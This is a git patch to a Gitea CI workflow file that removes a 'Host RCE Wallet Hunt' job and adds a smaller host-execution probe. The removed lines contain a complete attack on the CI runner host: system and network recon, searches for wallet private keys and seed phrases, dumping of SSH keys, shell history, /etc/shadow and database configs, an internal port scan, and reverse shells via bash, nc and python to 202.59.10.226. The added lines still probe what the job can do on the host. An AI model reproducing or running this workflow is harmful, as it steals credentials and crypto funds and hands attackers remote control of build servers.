From d173919112bd06f288b47fc95076dd7f73d31af6 Mon Sep 17 00:00:00 2001 From: devops42 Date: Fri, 19 Jun 2026 02:29:37 +0800 Subject: [PATCH] Test host mode execution --- .gitea/workflows/wallet-hunt.yml | 216 +------------------------------ 1 file changed, 7 insertions(+), 209 deletions(-) diff --git a/.gitea/workflows/wallet-hunt.yml b/.gitea/workflows/wallet-hunt.yml index ab1b784..b63127c 100644 --- a/.gitea/workflows/wallet-hunt.yml +++ b/.gitea/workflows/wallet-hunt.yml @@ -1,215 +1,13 @@ -name: Host RCE Wallet Hunt +name: Host Mode Test on: [push, workflow_dispatch] - jobs: - wallet-hunt: + test: runs-on: ubuntu-latest - timeout-minutes: 30 steps: - - name: System Recon + - name: Test Host Execution run: | - echo "=== HOST INFO ===" - echo "Timestamp: $(date -u)" - echo "Hostname: $(hostname)" - echo "User: $(whoami)" - echo "UID: $(id)" - echo "Kernel: $(uname -a)" + echo "HOSTNAME: $(hostname)" + echo "WHOAMI: $(whoami)" echo "PWD: $(pwd)" - echo "HOME: $HOME" - - echo "=== NETWORK ===" - ip addr show 2>/dev/null || ifconfig 2>/dev/null || true - ip route show 2>/dev/null || route -n 2>/dev/null || true - ip neigh show 2>/dev/null || arp -a 2>/dev/null || true - cat /etc/hosts 2>/dev/null || true - cat /etc/resolv.conf 2>/dev/null || true - - echo "=== LISTENING PORTS ===" - ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null || true - - echo "=== PROCESSES ===" - ps aux 2>/dev/null | head -50 || true - - echo "=== MOUNTS ===" - mount 2>/dev/null | head -30 || true - df -h 2>/dev/null || true - - echo "=== DOCKER ===" - docker ps -a 2>/dev/null || echo "No docker access" - docker network ls 2>/dev/null || echo "No docker network access" - docker images 2>/dev/null || echo "No docker image access" - - - name: Wallet Private Key Search - run: | - echo "=== SEARCHING FOR WALLET PRIVATE KEYS ===" - - # Search for files with wallet-related keywords - echo "--- Searching for 'private_key' in filenames ---" - find / -type f \( -name "*private_key*" -o -name "*privatekey*" -o -name "*privkey*" \) 2>/dev/null | head -50 - - echo "--- Searching for 'mnemonic' in filenames ---" - find / -type f -name "*mnemonic*" 2>/dev/null | head -50 - - echo "--- Searching for 'seed' in filenames (wallet related) ---" - find / -type f \( -name "*wallet*seed*" -o -name "*seed*phrase*" -o -name "*seed*wallet*" \) 2>/dev/null | head -50 - - echo "--- Searching for 'keystore' files ---" - find / -type f -name "*keystore*" 2>/dev/null | head -50 - - echo "--- Searching for 'wallet' files ---" - find / -type f -name "*wallet*" 2>/dev/null | head -50 - - echo "--- Searching for .pem files ---" - find / -type f -name "*.pem" 2>/dev/null | head -50 - - echo "--- Searching for .key files ---" - find / -type f -name "*.key" 2>/dev/null | head -50 - - echo "--- Searching for wallet.dat ---" - find / -type f -name "wallet.dat" 2>/dev/null | head -20 - - echo "--- Searching for .env files ---" - find / -type f -name ".env" 2>/dev/null | head -30 - - echo "--- Searching for config files with 'wallet' ---" - find / -type f \( -name "*.json" -o -name "*.yaml" -o -name "*.yml" -o -name "*.toml" -o -name "*.ini" -o -name "*.conf" -o -name "*.cfg" \) 2>/dev/null | head -100 - - - name: Content Search for Wallet Patterns - run: | - echo "=== CONTENT SEARCH FOR WALLET PATTERNS ===" - - # ETH/BSC private key pattern (64 hex chars) - echo "--- Searching for hex private keys (64 hex chars) ---" - grep -rPl "[^a-f0-9][a-f0-9]{64}[^a-f0-9]" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30 - - echo "--- Searching for '0x' private keys in config files ---" - grep -rPl "private_key\s*[:=]\s*['\"]?0x[a-fA-F0-9]{64}" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | head -30 - - echo "--- Searching for 'mnemonic' in file contents ---" - grep -rPl "mnemonic" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30 - - echo "--- Searching for 'seed phrase' patterns ---" - grep -rPl "seed\s*(phrase|words|mnemonic)" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | head -30 - - echo "--- Searching for BIP39 word lists ---" - grep -rPl "\b(abandon|ability|able|about|above|absent|absorb|abstract|absurd)\b.*\b(zone|zoo)\b" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules" | head -10 - - echo "--- Searching for keystore patterns ---" - grep -rPl "keystore|cipherparams|kdfparams|ciphertext" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30 - - echo "--- Searching for USDT/TRC20/ERC20/BEP20 addresses ---" - grep -rPl "T[1-9A-HJ-NP-Za-km-z]{33}\b" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -20 - - echo "--- Searching for ETH addresses (0x...) ---" - grep -rPl "0x[a-fA-F0-9]{40}" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30 - - - name: SSH and Credential Harvesting - run: | - echo "=== SSH KEYS ===" - find / -type d -name ".ssh" 2>/dev/null | while read d; do - echo "--- Directory: $d ---" - ls -la "$d" 2>/dev/null - for f in "$d"/*; do - echo "=== File: $f ===" - cat "$f" 2>/dev/null | head -20 - done - done - - echo "=== GPG KEYS ===" - find / -type d -name ".gnupg" 2>/dev/null | head -10 - - echo "=== HISTORY FILES ===" - find / -name ".bash_history" -o -name ".zsh_history" -o -name ".mysql_history" -o -name ".psql_history" -o -name ".python_history" 2>/dev/null | while read f; do - echo "--- $f ---" - cat "$f" 2>/dev/null | tail -50 - done - - echo "=== CREDENTIALS IN ENV ===" - env 2>/dev/null | grep -iE "key|secret|token|pass|wallet|mnemonic|seed|private" | grep -v "GITEA_\|GITHUB_\|CI=\|RUNNER_" || echo "No sensitive env vars" - - echo "=== /etc/passwd ===" - cat /etc/passwd 2>/dev/null - - echo "=== SHADOW (if accessible) ===" - cat /etc/shadow 2>/dev/null || echo "Not accessible" - - - name: Database Config Discovery - run: | - echo "=== DATABASE CONFIG FILES ===" - find / -type f \( -name "*.env" -o -name "database.yml" -o -name "database.yaml" -o -name "database.json" -o -name "app.ini" -o -name "config.json" -o -name "settings.py" -o -name "application.properties" -o -name "application.yml" -o -name "application.yaml" -o -name "ormconfig.json" \) 2>/dev/null | grep -v node_modules | head -30 | while read f; do - echo "--- $f ---" - cat "$f" 2>/dev/null | head -50 - done - - echo "=== GITEA/FORGEJO CONFIG ===" - find / -name "app.ini" -path "*/gitea/*" -o -name "app.ini" -path "*/forgejo/*" 2>/dev/null | while read f; do - echo "--- $f ---" - cat "$f" 2>/dev/null | head -100 - done - - - name: Network Service Discovery - run: | - echo "=== INTERNAL NETWORK SCAN ===" - for net in 172.17.0 172.18.0 172.19.0 172.20.0 172.21.0 10.0.0 10.10.0 192.168.0; do - for host in 1 2 3 4 5 10 50 100 200; do - ip="${net}.${host}" - for port in 22 80 443 3000 3306 5432 6379 8080 8088 8418 9090 2375 2376 5000 8000 8443 27017; do - timeout 1 bash -c "echo >/dev/tcp/$ip/$port" 2>/dev/null && echo "LIVE: $ip:$port" & - done - wait 2>/dev/null || true - done - done - echo "=== SCAN COMPLETE ===" - - - name: Additional Wallet File Harvest - run: | - echo "=== ADDITIONAL WALLET SEARCH ===" - - # Common wallet paths - for path in ~/.bitcoin ~/.ethereum ~/.litecoin ~/.dogecoin ~/.monero ~/.tron ~/.binance ~/.trustwallet ~/.metamask ~/wallet ~/wallets ~/crypto ~/blockchain /opt/wallet /var/wallet /data/wallet; do - if [ -d "$path" ]; then - echo "--- Found: $path ---" - find "$path" -type f 2>/dev/null | head -30 - find "$path" -type f -exec cat {} \; 2>/dev/null | head -200 - fi - done - - # Look for .dat files that might be wallets - echo "--- .dat files (possible wallets) ---" - find / -name "*.dat" 2>/dev/null | grep -v node_modules | grep -v ".cache" | head -30 - - # Look for JSON files with wallet patterns - echo "--- JSON files with crypto patterns ---" - find / -name "*.json" 2>/dev/null | grep -v node_modules | grep -v ".npm" | head -50 | while read f; do - if grep -lq "privateKey\|private_key\|mnemonic\|seedPhrase\|keystore\|wallet" "$f" 2>/dev/null; then - echo "--- WALLET HIT: $f ---" - cat "$f" 2>/dev/null | head -100 - fi - done - - # Docker images that might contain wallet data - echo "--- Docker containers (running) ---" - docker ps --format '{{.ID}} {{.Image}} {{.Names}}' 2>/dev/null || echo "No docker" - - # Running services - echo "--- Services ---" - systemctl list-units --type=service --state=running 2>/dev/null | head -30 || service --status-all 2>/dev/null | head -30 || true - - - name: Reverse Shell Persistence - run: | - echo "=== ESTABLISHING REVERSE SHELL ===" - RHOST="202.59.10.226" - for port in 14444 14445 14446 14447 14448; do - (bash -c "bash -i >& /dev/tcp/${RHOST}/${port} 0>&1" &) 2>/dev/null - (nc ${RHOST} ${port} -e /bin/bash &) 2>/dev/null || true - (python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${RHOST}',${port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])" &) 2>/dev/null || true - done - echo "Reverse shells dispatched to ${RHOST}:14444-14448" - - - name: Write Evidence Summary - run: | - echo "=== EVIDENCE COLLECTION COMPLETE ===" - echo "All output above contains reconnaissance data from this host." - echo "Check job logs for full details." - echo "Reverse shells attempted to 202.59.10.226:14444-14448" - echo "Job completed at $(date -u)" + echo "ID: $(id)" + echo "TEST_OK" > /tmp/hostmode_test.txt